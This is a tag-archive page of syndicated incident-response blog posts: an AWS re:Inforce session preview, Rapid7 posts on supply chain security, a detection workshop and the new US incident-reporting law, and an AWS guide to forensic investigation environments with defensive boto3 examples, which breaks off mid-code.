Tag Archives: incident response

AWS re:Inforce 2022: Threat detection and incident response track preview

Post Syndicated from Celeste Bishop original https://aws.amazon.com/blogs/security/aws-reinforce-2022-threat-detection-and-incident-response-track-preview/

Register now with discount code SALXTDVaB7y to get $150 off your full conference pass to AWS re:Inforce. The offer is available for a limited time only and while supplies last.

Today we’re going to highlight just some of the sessions focused on threat detection and incident response that are planned for AWS re:Inforce 2022. AWS re:Inforce is a learning conference focused on security, compliance, identity, and privacy. The event features access to hundreds of technical and business sessions, an AWS Partner expo hall, a keynote featuring AWS Security leadership, and more. AWS re:Inforce 2022 will take place in-person in Boston, MA on July 26-27.

AWS re:Inforce organizes content across multiple themed tracks: identity and access management; threat detection and incident response; governance, risk, and compliance; networking and infrastructure security; and data protection and privacy. This post highlights some of the breakout sessions, chalk talks, builders’ sessions, and workshops planned for the threat detection and incident response track. For additional sessions and descriptions, see the re:Inforce 2022 catalog preview. For other highlights, see our sneak peek at the identity and access management sessions and sneak peek at the data protection and privacy sessions.

Breakout sessions

These are lecture-style presentations that cover topics at all levels and are delivered by AWS experts, builders, customers, and partners. Breakout sessions typically include 10–15 minutes of Q&A at the end.

TDR201: Running effective security incident response simulations
Security incidents provide learning opportunities for improving your security posture and incident response processes. Ideally, you want to learn these lessons before having a security incident. In this session, walk through the process of running and moderating effective incident response simulations with your organization’s playbooks. Learn how to create realistic real-world scenarios, collect valuable learnings and feed them back into implementation, and document correction-of-error proceedings to improve processes. This session provides knowledge that can help you start assessing your organization’s incident response processes, procedures, communication paths, and documentation.

TDR202: What’s new with AWS threat detection services
AWS threat detection teams continue to innovate and improve the foundational security services for proactive and early detection of security events and posture management. Keeping up with the latest capabilities can improve your security posture, raise your security operations efficiency, and reduce your mean time to remediation (MTTR). In this session, learn about recent launches that can be used independently or integrated together for different use cases. Services covered in this session include Amazon GuardDuty, Amazon Detective, Amazon Inspector, Amazon Macie, and centralized cloud security posture assessment with AWS Security Hub.

TDR301: A proactive approach to zero-days: Lessons learned from Log4j
In the run-up to the 2021 holiday season, many companies were affected by vulnerabilities in the widely used Java logging framework, Apache Log4j. Organizations found themselves in a reactive position, trying to answer questions like: How do we figure out if this is in our environment? How do we remediate across our environment? How do we protect our environment? In this session, learn about proactive measures that you should implement now to better prepare for future zero-day vulnerabilities.

TDR303: Zoom’s journey to hyperscale threat detection and incident response
Zoom, a leader in modern enterprise video communications, experienced hyperscale growth during the pandemic. Their customer base expanded by 30x and their daily security logs went from being measured in gigabytes to terabytes. In this session, Zoom shares how their security team supported this breakneck growth by evolving to a centralized infrastructure, updating their governance process, and consolidating to a single pane of glass for a more rapid response to security concerns. Solutions used to accomplish their goals include Splunk, AWS Security Hub, Amazon GuardDuty, Amazon CloudWatch, Amazon S3, and others.

Builders’ sessions

These are small-group sessions led by an AWS expert who guides you as you build a solution on your own laptop.

TDR351: Using Kubernetes audit logs for incident response automation
In this hands-on builders’ session, learn how to use Amazon CloudWatch and Amazon GuardDuty to effectively monitor Kubernetes audit logs—part of the Amazon EKS control plane logs—to alert on suspicious events, such as an increase in 403 Forbidden or 401 Unauthorized responses. Also learn how to automate example incident response actions to streamline workflows and remediation.

TDR352: How to mitigate the risk of ransomware in your AWS environment
Join this hands-on builders’ session to learn how to mitigate the risk from ransomware in your AWS environment using the NIST Cybersecurity Framework (CSF). Choose your own path to learn how to protect, detect, respond, and recover from a ransomware event using key AWS security and management services. Use Amazon Inspector to detect vulnerabilities, Amazon GuardDuty to detect anomalous activity, and AWS Backup to automate recovery. This session is beneficial for security engineers, security architects, and anyone responsible for implementing security controls in their AWS environment.

Chalk talks

These are highly interactive sessions with a small audience. Experts lead you through problems and solutions on a digital whiteboard as the discussion unfolds.

TDR231: Automated vulnerability management and remediation for Amazon EC2
In this chalk talk, learn about vulnerability management strategies for Amazon EC2 instances on AWS at scale. Discover the role of services like Amazon Inspector, AWS Systems Manager, and AWS Security Hub in vulnerability management and mechanisms to perform proactive and reactive remediations of findings that Amazon Inspector generates. Also learn considerations for managing vulnerabilities across multiple AWS accounts and Regions in an AWS Organizations environment.

TDR332: Response preparation with ransomware tabletop exercises
Many organizations do not validate their critical processes prior to an event such as a ransomware attack. A security tabletop exercise uses simulation to provide a realistic training experience, so organizations can test their security resilience and mitigate risk. In this chalk talk, learn about AWS Managed Services (AMS) best practices through a live, interactive tabletop exercise that demonstrates how to run a simulation of a ransomware scenario. Attendees will leave with a deeper understanding of incident response preparation and how to use AWS security tools to better respond to ransomware events.

Workshops

These are interactive learning sessions where you work in small teams to solve problems using AWS Cloud security services. Come prepared with your laptop and a willingness to learn!

TDR271: Detecting and remediating security threats with Amazon GuardDuty
This workshop walks through scenarios covering threat detection and remediation using Amazon GuardDuty, a managed threat detection service. The scenarios simulate an incident that spans multiple threat vectors, representing a sample of threats related to Amazon EC2, AWS IAM, Amazon S3, and Amazon EKS that GuardDuty is able to detect. Learn how to view and analyze GuardDuty findings, send alerts based on the findings, and remediate findings.

TDR371: Building an AWS incident response runbook using Jupyter notebooks
This workshop guides you through building an incident response runbook for your AWS environment using Jupyter notebooks. Walk through an easy-to-follow sample incident using a ready-to-use runbook. Then add new programmatic steps and documentation to the Jupyter notebook, helping you discover and respond to incidents.

TDR372: Detecting and managing vulnerabilities with Amazon Inspector
Join this workshop to get hands-on experience using Amazon Inspector to scan Amazon EC2 instances and container images residing in Amazon Elastic Container Registry (Amazon ECR) for software vulnerabilities. Learn how to manage findings by creating prioritization and suppression rules, and learn how to understand the details found in example findings.

TDR373: Industrial IoT hands-on threat detection
Modern organizations understand that enterprise and industrial IoT (IIoT) yields significant business benefits. However, unaddressed security concerns can expose vulnerabilities and slow down companies looking to accelerate digital transformation by connecting production systems to the cloud. In this workshop, use a case study to detect and remediate a compromised device in a factory using security monitoring and incident response techniques. Use an AWS multilayered security approach and top ten IIoT security golden rules to improve the security posture in the factory.

TDR374: You’ve received an Amazon GuardDuty EC2 finding: What’s next?
You’ve received an Amazon GuardDuty finding drawing your attention to a possibly compromised Amazon EC2 instance. How do you respond? In part one of this workshop, perform an Amazon EC2 incident response using proven processes and techniques for effective investigation, analysis, and lessons learned. Use the AWS CLI to walk step-by-step through a prescriptive methodology for responding to a compromised Amazon EC2 instance that helps effectively preserve all available data and artifacts for investigations. In part two, implement a solution that automates the response and forensics process within an AWS account, so that you can use the lessons learned in your own AWS environments.

If any of the sessions look interesting, consider joining us by registering for re:Inforce 2022. Use code SALXTDVaB7y to save $150 on the price of registration; the offer is available for a limited time only and while supplies last. Also, stay tuned for additional sessions that will be added to the catalog soon. We look forward to seeing you in Boston!

Celeste Bishop

Celeste is a Product Marketing Manager in AWS Security, focusing on threat detection and incident response solutions. Her background is in experience marketing and also includes event strategy at Fortune 100 companies. A passionate soccer fan, she can be found on any given weekend cheering on Liverpool FC and her local home club, Austin FC.

Charles Goldberg

Charles leads the Security Services product marketing team at AWS. He is based in Silicon Valley and has worked with networking, data protection, and cloud companies. His mission is to help customers understand solution best practices that can reduce the time and resources required for improving their company’s security and compliance outcomes.

How to Strategically Scale Vendor Management and Supply Chain Security

Post Syndicated from AJ Debole original https://blog.rapid7.com/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/

This post is co-authored by Collin Huber

Recent security events — particularly the threat actor activity from the Lapsus$ group, Spring4Shell, and various new supply chain attacks — have the security community on high alert. Security professionals and network defenders around the world are wondering what we can do to make the organizations we serve less likely to be featured in an article as the most recently compromised company.

In this post, we’ll articulate some simple changes we can all make in the near future to provide more impactful security guidance and controls to decrease risk in our environments.

Maintain good cyber hygiene

Here are some basic steps that organizations can take to ensure their security posture is in good health and risks are at a manageable level.

1. Review privileged user activity for anomalies

Take this opportunity to review logs of privileged user activity. Additionally, review instances of changed passwords, as well as any other unexpected activity, and interview the affected end user to help determine whether the change was legitimate. Take into consideration the types of endpoints used across your network, as well as expected actions or any changes to privileges (e.g., privilege escalation).
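If your environment runs on AWS, one place to pull this activity from is AWS CloudTrail. The following minimal sketch (the user name and 24-hour window are hypothetical) lists recent API calls for a privileged user so you can scan them for anomalies:

```python
import boto3
from datetime import datetime, timedelta, timezone

# Hypothetical example: review the last 24 hours of API activity for a privileged user.
cloudtrail = boto3.client("cloudtrail")

end = datetime.now(timezone.utc)
start = end - timedelta(hours=24)

paginator = cloudtrail.get_paginator("lookup_events")
pages = paginator.paginate(
    LookupAttributes=[{"AttributeKey": "Username", "AttributeValue": "admin-jdoe"}],
    StartTime=start,
    EndTime=end,
)

for page in pages:
    for event in page["Events"]:
        # Print a compact summary; flag anything unexpected for follow-up with the user.
        print(event["EventTime"], event["EventName"], event.get("EventSource", ""))
```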

2. Enforce use of multifactor authentication

Has multifactor authentication (MFA) deployment stalled at your firm? This is an excellent opportunity to revisit those initiatives. Use of MFA reduces the potential for compromise in a significant number of instances. There are several options for deploying MFA. Hardware-based methods, such as FIDO tokens, are typically the strongest, and numerous options offer user-friendly ways to use MFA — for example, from a smartphone. Ensure that employees and third parties are trained not to accept unexpected prompts to approve a connection.

3. Understand vendor risks

Does your acquisition process consider the security posture of the vendor in question? Based on the use case for the vendor and the business need, consider the security controls you require to maintain the integrity of your environment. Additionally, review available security reports to identify security controls to investigate further. If a security incident has occurred, consider the mitigating controls that were missing for that vendor. Depending on the vendor’s response and their ability to implement those security controls, determine whether this should influence purchase decisions or contract renewal.

4. Review monitoring and alerts

Review system logs for other critical systems, including those with high volumes of data. Consider reviewing systems that may not store, process, or transmit sensitive data but could have considerable vulnerabilities. Depending on the characteristics of these systems and their mitigating controls, it may be appropriate to prioritize patching, implement additional mitigating controls, and even consider additional alerting.

Always make sure to act as soon as you can. It’s better to activate your incident response (IR) plan and later de-escalate than to delay action.

Build a more secure supply chain

Risks are inherent in the software supply chain, but there are some strategies that can help you ensure your vendors are as secure as possible. Here are three key concepts to consider implementing.

1. Enumerate edge connection points between internal and vendor environments

Every organization has ingress and egress points with various external applications and service providers. When new services or vendors are procured, access control lists (ACLs) are updated to accommodate the new data streams — which presents an opportunity to record simple commands for shutting those streams down in the event of a vendor compromise.

Early stages of an incident are often daunting, frustrating, and confusing for all parties involved. Empowering information security (IS) and information technology (IT) teams to have these commands ahead of time decreases the guesswork that needs to be done to create them when an event occurs. This frees up resources to perform other critical elements of your IR plan as appropriate.

One of the most critical elements of incident response is containment. Many vendors will immediately disable external connections when an attack is discovered, but relying on an external party to act in the best interest of your organization is a challenging position for any security professional. If your organization has a list of external connections open to the impacted vendor, creating templates or files with ready-to-paste commands that sever those connections is an easy step in the planning phase of incident response. These commands can be pre-approved for dispatch by senior leadership and immediately put in place to ensure that whatever nefarious behavior is occurring on the vendor’s network cannot pass into your environment.
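As one illustration of what such a pre-approved command file might contain, assuming an AWS environment and using a hypothetical network ACL ID and vendor CIDR range, the following sketch adds deny entries that block traffic to and from the vendor:

```python
import boto3

# Hypothetical values: the network ACL protecting the subnets that talk to the vendor,
# and the vendor's published CIDR range. Keep these in your IR runbook, pre-approved.
NACL_ID = "acl-0123456789abcdef0"
VENDOR_CIDR = "203.0.113.0/24"

ec2 = boto3.client("ec2")

# Deny all inbound and outbound traffic to/from the vendor CIDR.
# Low rule numbers are evaluated first, so these entries take precedence.
for egress, rule_number in ((False, 10), (True, 10)):
    ec2.create_network_acl_entry(
        NetworkAclId=NACL_ID,
        RuleNumber=rule_number,
        Protocol="-1",          # all protocols
        RuleAction="deny",
        Egress=egress,
        CidrBlock=VENDOR_CIDR,
    )

print(f"Vendor CIDR {VENDOR_CIDR} blocked on {NACL_ID}")
```

The same idea applies to whatever firewall or ACL technology you use; the point is to have the exact commands written, reviewed, and approved before an incident occurs.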

An additional benefit of enumerating and memorializing these commands is that teams can practice or review them during annual updates of the incident response plan (IRP) or during tabletop exercises. If your organization does not have this information prepared right now, you have a great opportunity to collaborate with your IS and IT teams to improve your preparedness for a vendor compromise.

Vendor compromises can result in service outages which may have an operational impact on your organization. When your organization is considering ways to mitigate potential risks associated with outages and other supply chain issues, review your business continuity plan to ensure it has the appropriate coverage and provides right-sized guidance for resiliency. It may not make business sense to have alternatives for every system or process, so memorialize accepted risks in a Plan of Action and Milestones (POAM) and/or your Risk Register to record your rationale and demonstrate due diligence.

2. Maintain a vendor inventory with key POCs and SLAs

Having a centralized repository of vendors with key points of contact (POCs) for the account and service-level agreements (SLAs) relevant to the business relationship is an invaluable asset in the event of a breach or attack. The repository enables rapid communication with the appropriate parties at the vendor to open and maintain a clear line of communication, so you can share updates and get critical questions answered in a timely fashion. Having SLAs related to system downtime and system support is also instrumental to ensure the vendor is furnishing the agreed-upon services as promised.

3. Prepare templates to communicate to customers and other appropriate parties

Finally, set up templates for communications about what your team is doing to protect the environment and answer any high-level questions in the event of a security incident. For these documents, it is best to work with legal departments and senior leadership to ensure the amount of information provided and the manner in which it is disclosed is appropriate.

  • Internal communication: Have a formatted memo ready to address the key elements of what is occurring and keep staff apprised of the situation. You may want to include remarks indicating that an investigation is underway, that your internal environment is being monitored, relevant impacts staff may see, who to contact if external parties have questions, and a reminder of how to report unusual device behavior to your help desk or security team.
  • External communication: Prepare communication for the press regarding the investigation or the severity of the breach, as appropriate.
  • Regulatory notices: Work with legal teams to templatize regulatory notifications so that technical teams can easily provide the required data in an easy-to-update format.

Complex software supply chains introduce a wide range of vulnerabilities into our environments – but with these strategic steps in place, you can limit the impacts of security incidents and keep risk to a minimum in your third-party vendor relationships.

Sharpen Your IR Capabilities With Rapid7’s Detection and Response Workshop

Post Syndicated from Mikayla Wyman original https://blog.rapid7.com/2022/04/04/sharpen-your-ir-capabilities-with-rapid7s-detection-and-response-workshop/

You’re tasked with protecting your environment, and you’ve invested significant time and resources into deploying and configuring your tools — but how do you know if the security controls you’ve put into place are effective? The challenge continues to grow as attacker tactics, techniques, and procedures (TTPs) constantly evolve. In today’s landscape, a security breach is nearly inevitable.

Amid an ever-changing threat landscape, do you have confidence your tools are able to immediately detect threats when they occur? And more importantly, does your team know how to effectively respond to stop the attack, and do it fast?

While we don’t have a crystal ball to offer, we can help make sure your detection and response plan holds up against a breach.

Say hello to Rapid7’s newest incident response service: the Detection and Response Workshop.

Put your safeguards to the test with a guided attack simulation

The Detection and Response Workshop is a guided exercise led by Rapid7’s digital forensics and incident response (DFIR) experts to confirm that your team can quickly detect threats and evaluate your response procedures against a simulated attack within your environment.

This workshop isn’t a Tabletop Exercise (TTX), an IR Planning engagement, or a Purple Team exercise. We’ll pit your organization’s defenders against the latest attack campaigns, within the tools they use on a daily basis, to test your ability to respond when an incident happens under live conditions, without your company’s reputation at stake.

Each Workshop simulation is tailored to your specific needs and mapped to the MITRE ATT&CK Framework. Throughout the Workshop, our experts make recommendations to help strengthen your program – from existing configurations of tools, products, and devices to analysis processes and documentation.

The workshop itself is hands-on and doesn’t require current use of a Rapid7 product. Any security team can utilize this new service to understand what TTPs an adversary may use against them and make sure their program detects and responds accordingly.

Your team will leave the multi-day workshop feeling confident that you have an understanding of where and how to strengthen your existing IR process and detection and response program. You’ll receive a detailed report of the workshop, including our written assessment and recommendations to build resilience into your response program.

Rapid7 Incident Response consulting services

Security is the core of our business, and IR plays a huge role in the security landscape. Our team of DFIR experts — the same experts who respond to incidents for all 1,200+ of our MDR customers — have decades of experience that they use to analyze your security setup from all angles. Our team includes experts in threat analysis, forensics, and malware analysis, along with a deep understanding of industry-leading technologies.

Knowing where your program stands is a crucial part of enhancing it, and our IR team has built specialized services to help your team build resiliency at each stage in the process. We now offer a full Incident Response Service Curriculum, allowing teams to engage in a single course for their IR goals or register for the entire curriculum.

From planning to full attack simulations, your team can level up its skills with tailored guidance and coaching through each course:

  • Course 101: Incident Response Program Development
  • Course 201: Tabletop Exercise (TTX)
  • Course 301: Detection & Response Workshop
  • Course 401: Purple Team Exercise

No matter what stage your team is in building your incident response program, our experts are able to help analyze and provide recommendations for improvement.

The Detection & Response Workshop is available now for all security teams. To learn more, talk to a Rapid7 sales representative by filling out this form today.

New US Law to Require Cyber Incident Reports

Post Syndicated from Harley Geiger original https://blog.rapid7.com/2022/03/10/new-us-laws-to-require-cyber-incident-reports/

On March 9, 2022, the US Congress passed the Cyber Incident Reporting for Critical Infrastructure Act of 2022. Once signed by the President, it will become law. The law will require critical infrastructure owners and operators to report cyber incidents and ransomware payments. The legislation was developed in the wake of the SolarWinds supply chain attack and recently gained additional momentum from the Russia-Ukraine conflict. This post will walk through highlights from the law.

Rapid7 supports efforts to increase transparency and information sharing in order to strengthen awareness of the cybersecurity threat landscape and prepare for cyberattacks. We applaud passage of the Cyber Incident Reporting for Critical Infrastructure Act.

What’s this law about?

The Cyber Incident Reporting for Critical Infrastructure Act will require critical infrastructure owners and operators — such as water and energy utilities, health care organizations, some IT providers, etc. — to submit reports to the Cybersecurity and Infrastructure Security Agency (CISA) for cybersecurity incidents and ransomware payments. The law will provide liability protections for submitting reports to encourage compliance, but noncompliance can result in a civil lawsuit. The law will also require the government to analyze, anonymize, and share information from the reports to provide agencies, Congress, companies, and the public with a better view of the cyber threat landscape.

An important note about the timeline: The requirements do not take effect until CISA issues a clarifying regulation. The law will require CISA to issue this regulation within 42 months (though CISA may take less time), so the requirements may not be imminent. In the meantime, the Cyber Incident Reporting for Critical Infrastructure Act provides information on what CISA’s future rule must address.

We detail these items from the law below.

Requiring reporting of cyber incidents and ransom payments

  • Report requirement. Critical infrastructure owners and operators must report substantial cybersecurity incidents to CISA, as well as any ransom payments. (However, as described below, this requirement does not come into effect until CISA issues a regulation.)
  • Type of incident. The types of cyber incidents that must be reported shall include actual breaches of sensitive information and attacks that disrupt business or operations. Mere threats or failed attacks do not need to be reported.
  • Report timeline. For a cyber incident, the report must be submitted within 72 hours after the affected organization determines the incident is substantial enough that it must be reported. For ransom payments, the report must be submitted within 24 hours after the payment is made.
  • Report contents. The reports must include specified information, including attacker tactics and techniques. Information related to the incident must be preserved until the incident is fully resolved.
  • Enforcement. If an entity does not comply with reporting requirements, CISA may issue a subpoena to compel entities to produce the required information. The Justice Department may initiate a civil lawsuit to enforce the subpoena. Entities that do not comply with the subpoena may be found in contempt of court.

CISA rule to fill in details

  • Rule requirement. CISA is required to issue a regulation that will establish details on the reporting requirements. The reporting requirements do not take effect until this regulation is final.
  • Rule timeline. CISA has up to 42 months to finalize the rule (but the agency can choose to take less time).
  • Rule contents. The rule will establish the types of cyber incidents that must be reported, the types of critical infrastructure entities that must report, the content to be included in the reports, the mechanism for submitting the reports, and the details for preserving data related to the reports.

Protections for submitting reports

  • Not used for regulation. Reports submitted to CISA cannot be used to regulate the activities of the entity that submitted the report.
  • Privileges preserved. The covered entity may designate the reports as commercial and proprietary information. Submission of a report shall not be considered a waiver of any privilege or legal protection.
  • No liability for submitting. No court may maintain a cause of action against any person or entity on the sole basis of submitting a report in compliance with this law.
  • Cannot be used as evidence. Reports, and material used to prepare the reports, cannot be received as evidence or used in discovery proceedings in any federal or state court or regulatory body.

What the government will do with the report information

  • Authorized purposes. The federal government may use the information in the reports for cybersecurity purposes, responding to safety or serious economic threats, and preventing child exploitation.
  • Rapid response. For reports on ongoing threats, CISA must rapidly share cyber threat indicators and defensive measures with stakeholders.
  • Information sharing. CISA must analyze reports and share information with other federal agencies, Congress, private sector stakeholders, and the public. CISA’s information sharing must include assessment of the effectiveness of security controls, adversary tactics and techniques, and the national cyber threat landscape.

What’s Rapid7’s view of the law?

Rapid7 views the Cyber Incident Reporting for Critical Infrastructure Act as a positive step. Cybersecurity is essential to ensure critical infrastructure is safe, and this law would give federal agencies more insight into attack trends, and would potentially help provide early warnings of major vulnerabilities or attacks in progress before they spread. The law carefully avoids requiring reports too early in the incident response process and provides protections to encourage companies to be open and transparent in their reports.

Still, the Cyber Incident Reporting for Critical Infrastructure Act does little to ensure critical infrastructure has safeguards that prevent cyber incidents from occurring in the first place. This law is unlikely to change the fact that many critical infrastructure entities are under-resourced and, in some cases, have security maturity that is not commensurate with the risks they face. The law’s enforcement mechanism (a potential contempt of court penalty) is not especially strong, and the final reporting rules may not be implemented for another 3.5 years. Ultimately, the law’s effect may be similar to state breach notification laws, which raised awareness but did not prompt widespread adoption of security safeguards for personal information until states implemented data security laws.

So, the Cyber Incident Reporting for Critical Infrastructure Act is a needed and helpful improvement — but, as always, there is more to be done.

Forensic investigation environment strategies in the AWS Cloud

Post Syndicated from Sol Kavanagh original https://aws.amazon.com/blogs/security/forensic-investigation-environment-strategies-in-the-aws-cloud/

When a deviation from your secure baseline occurs, it’s crucial to respond and resolve the issue quickly and follow up with a forensic investigation and root cause analysis. Having a preconfigured infrastructure and a practiced plan for using it when there’s a deviation from your baseline will help you to extract and analyze the information needed to determine the impact, scope, and root cause of an incident and return to operations confidently.

Time is of the essence in understanding the what, how, who, where, and when of a security incident. You often hear of automated incident response, which has repeatable and auditable processes to standardize the resolution of incidents and accelerate evidence artifact gathering.

Similarly, having a standard, pristine, pre-configured, and repeatable forensic clean-room environment that can be automatically deployed through a template allows your organization to minimize human interaction, keep the larger organization separate from contamination, hasten evidence gathering and root cause analysis, and protect forensic data integrity. The forensic analysis process assists in data preservation, acquisition, and analysis to identify the root cause of an incident. This approach can also facilitate the presentation or transfer of evidence to outside legal entities or auditors. AWS CloudFormation templates—or other infrastructure as code (IaC) provisioning tools—help you to achieve these goals, providing your business with consistent, well-structured, and auditable results that allow for a better overall security posture. Having these environments as a permanent part of your infrastructure allows them to be well documented and tested, and gives you opportunities to train your teams in their use.

This post provides strategies that you can use to prepare your organization to respond to secure baseline deviations. These strategies take the form of best practices around Amazon Web Services (AWS) account structure, AWS Organizations organizational units (OUs) and service control policies (SCPs), forensic Amazon Virtual Private Cloud (Amazon VPC) and network infrastructure, evidence artifacts to be collected, AWS services to be used, forensic analysis tool infrastructure, and user access and authorization to the above. The specific focus is to provide an environment where Amazon Elastic Compute Cloud (Amazon EC2) instances with forensic tooling can be used to examine evidence artifacts.

This post presumes that you already have an evidence artifact collection procedure or that you are implementing one and that the evidence can be transferred to the accounts described here. If you are looking for advice on how to automate artifact collection, see How to automate forensic disk collection for guidance.

Infrastructure overview

A well-architected multi-account AWS environment is based on the structure provided by Organizations. As companies grow and need to scale their infrastructure with multiple accounts, often in multiple AWS Regions, Organizations offers programmatic creation of new AWS accounts combined with central management and governance that helps them to do so in a controlled and standardized manner. This programmatic, centralized approach should be used to create the forensic investigation environments described in the strategy in this blog post.

The example in this blog post uses a simplified structure with separate dedicated OUs and accounts for security and forensics, shown in Figure 1. Your organization’s architecture might differ, but the strategy remains the same.

Note: There might be reasons for forensic analysis to be performed live within the compromised account itself, such as to avoid shutting down or accessing the compromised instance or resource; however, that approach isn’t covered here.

Figure 1: AWS Organizations forensics OU example

The most important components in Figure 1 are:

  • A security OU, which is used for hosting security-related access and services. The security OU and the associated AWS accounts should be owned and managed by your security organization.
  • A forensics OU, which should be a separate entity, although it can have some similarities and crossover responsibilities with the security OU. There are several reasons for having it within a separate OU and account. Some of the more important reasons are that the forensics team might be a different team than the security team (or a subset of it), certain investigations might be under legal hold with additional access restrictions, or a member of the security team could be the focus of an investigation.

When speaking about Organizations, accounts, and the permissions required for various actions, you must first look at SCPs, a core functionality of Organizations. SCPs offer control over the maximum available permissions for all accounts in your organization. In the example in this blog post, you can use SCPs to provide similar or identical permission policies to all the accounts under the forensics OU, which is being used as a resource container. An SCP acts as a guardrail on the accounts it’s attached to, and is a crucial mechanism to ensure that you can explicitly deny or allow the API calls you choose. Some use cases of SCPs are to restrict the ability to disable AWS CloudTrail, restrict root user access, and ensure that all actions taken in the forensic investigation account are logged. This provides a centralized way to avoid changing individual policies for users, groups, or roles. Access to the forensic environment should follow a least-privilege model, with nobody capable of modifying or compromising the initially collected evidence. For an investigation environment, denying all actions except those you want to list as exceptions is the most straightforward approach. Start with the default of denying all, and work your way towards the least authorizations needed to perform the forensic processes established by your organization. AWS Config can be a valuable tool to track the changes made to the account and provide evidence of these changes.

Keep in mind that once the restrictive SCP is applied, even the root account or those with administrator access won’t have access beyond those permissions; therefore, frequent, proactive testing as your environment changes is a best practice. Also, be sure to validate which principals can remove the protective policy, if required, to transfer the account to an outside entity. Finally, create the environment before the restrictive permissions are applied, and then move the account under the forensic OU.
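As a minimal sketch of that sequence, with a hypothetical OU ID and an illustrative exception list that you would tighten for your own forensic processes, you could create and attach a restrictive SCP programmatically:

```python
import json
import boto3

org = boto3.client("organizations")

# Hypothetical starting point: deny everything except a short, explicit allow list.
# Tighten or expand the NotAction list as you test your forensic procedures.
scp_document = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyAllExceptForensicTooling",
            "Effect": "Deny",
            "NotAction": [
                "ec2:*",
                "s3:*",
                "ssm:*",
                "logs:*",
                "cloudtrail:LookupEvents",
            ],
            "Resource": "*",
        }
    ],
}

policy = org.create_policy(
    Name="forensics-ou-guardrail",
    Description="Restrictive guardrail for the forensics OU",
    Type="SERVICE_CONTROL_POLICY",
    Content=json.dumps(scp_document),
)

# Hypothetical OU ID for the forensics OU.
org.attach_policy(
    PolicyId=policy["Policy"]["PolicySummary"]["Id"],
    TargetId="ou-abcd-12345678",
)
```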

Having a separate AWS account dedicated to forensic investigations helps keep your larger organization separate from the possible threat of contamination from the incident itself, helps ensure the isolation and protection of the integrity of the artifacts being analyzed, and keeps the investigation confidential. Separate accounts also avoid situations where threat actors might have exhausted the resources immediately available to your compromised AWS account by hitting service quotas, which would prevent you from launching an Amazon EC2 instance to perform investigations.

Having a forensic investigation account per Region is also a good practice, as it keeps the investigative capabilities close to the data being analyzed, reduces latency, and avoids issues of the data changing regulatory jurisdictions. For example, data residing in the EU might need to be examined by an investigative team in North America, but the data itself cannot be moved out of the EU because of GDPR compliance requirements. For global customers, forensics teams might be situated in different locations worldwide and have different processes. It’s better to have a forensic account in the Region where an incident arose. The account as a whole could also then be provided to local legal institutions or third-party auditors if required. That said, if your AWS infrastructure is contained within Regions in only one jurisdiction or country, then a single re-creatable account in one Region, with evidence artifacts shared from and kept in their respective Regions, could be an easier architecture to manage over time.

An account created in an automated fashion using a CloudFormation template—or other IaC methods—allows you to minimize human interaction before use by recreating an entirely new and untouched forensic analysis instance for each separate investigation, ensuring its integrity. Individual people will only be given access as part of a security incident response plan, and even then, permissions to change the environment should be minimal or none at all. The post-investigation environment would then be either preserved in a locked state or removed, and a fresh, blank one created in its place for the subsequent investigation with no trace of the previous artifacts. Templating your environment also facilitates testing to ensure your investigative strategy, permissions, and tooling will function as intended.

Accessing your forensics infrastructure

Once you’ve defined where your investigative environment should reside, you must think about who will be accessing it, how they will do so, and what permissions they will need.

The forensic investigation team can be a separate team from the security incident response team, the same team, or a subset. You should provide precise access rights to the group of individuals performing the investigation as part of maintaining least privilege.

You should create specific roles for the various needs of the forensic procedures, each with only the permissions required. As with SCPs and other situations described here, start with no permissions and add authorizations only as required while establishing and testing your templated environments. As an example, you might create the following roles within the forensic account:

  • Responder – acquire evidence
  • Investigator – analyze evidence
  • Data custodian – manage (copy, move, delete, and expire) evidence
  • Analyst – access forensics reports for analytics, trends, and forecasting (threat intelligence)

You should establish an access procedure for each role, and include it in the response plan playbook. This will help you ensure least-privilege access as well as environment integrity. For example, establish a process for an owner of the security incident response plan to verify and approve the request for access to the environment. Another alternative is the two-person rule. Alerting on login is an additional security measure that you can add to help increase confidence in the environment’s integrity and to monitor for unauthorized access.
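For example, the following sketch (hypothetical role name and trusted account ID) creates an investigator role that can be assumed only with MFA and starts from a broad read-only baseline that you would later narrow:

```python
import json
import boto3

iam = boto3.client("iam")

# Hypothetical account ID of the identity (or security tooling) account from which
# investigators assume this role.
TRUSTED_ACCOUNT_ID = "111122223333"

trust_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"AWS": f"arn:aws:iam::{TRUSTED_ACCOUNT_ID}:root"},
            "Action": "sts:AssumeRole",
            # Require MFA for anyone assuming the investigator role.
            "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}},
        }
    ],
}

iam.create_role(
    RoleName="forensics-investigator",
    AssumeRolePolicyDocument=json.dumps(trust_policy),
    Description="Read-only analysis of collected evidence",
    MaxSessionDuration=3600,
)

# Start with a broad read-only baseline, then replace it with a narrower
# customer managed policy as your forensic procedures are finalized.
iam.attach_role_policy(
    RoleName="forensics-investigator",
    PolicyArn="arn:aws:iam::aws:policy/ReadOnlyAccess",
)
```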

You want the investigative role to have read-only access to the original evidence artifacts collected, generally consisting of Amazon Elastic Block Store (Amazon EBS) snapshots, memory dumps, logs, or other artifacts in an Amazon Simple Storage Service (Amazon S3) bucket. The original sources of evidence should be protected; MFA delete and S3 versioning are two methods for doing so. Work should be performed on copies of copies if rendering the original immutable isn’t possible, especially if any modification of the artifact will happen. This is discussed in further detail below.

Evidence should only be accessible from the roles that absolutely require access—that is, investigator and data custodian. To help prevent potential insider threat actors from being aware of the investigation, you should deny even read access from any roles not intended to access and analyze evidence.
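One way to express that restriction, shown here as a sketch with hypothetical bucket and role names, is an explicit deny in the evidence bucket policy for every principal other than the investigator and data custodian roles, with versioning enabled to help preserve originals:

```python
import json
import boto3

s3 = boto3.client("s3")

# Hypothetical names: the evidence bucket, the forensics account ID, and the two
# roles that are allowed to read evidence.
BUCKET = "example-forensics-evidence"
ACCOUNT_ID = "444455556666"
ALLOWED_ROLE_ARNS = [
    f"arn:aws:iam::{ACCOUNT_ID}:role/forensics-investigator",
    f"arn:aws:iam::{ACCOUNT_ID}:role/forensics-data-custodian",
]

bucket_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyEvidenceAccessExceptForensicRoles",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                f"arn:aws:s3:::{BUCKET}",
                f"arn:aws:s3:::{BUCKET}/*",
            ],
            # Explicitly deny every principal whose role ARN is not in the allowed list.
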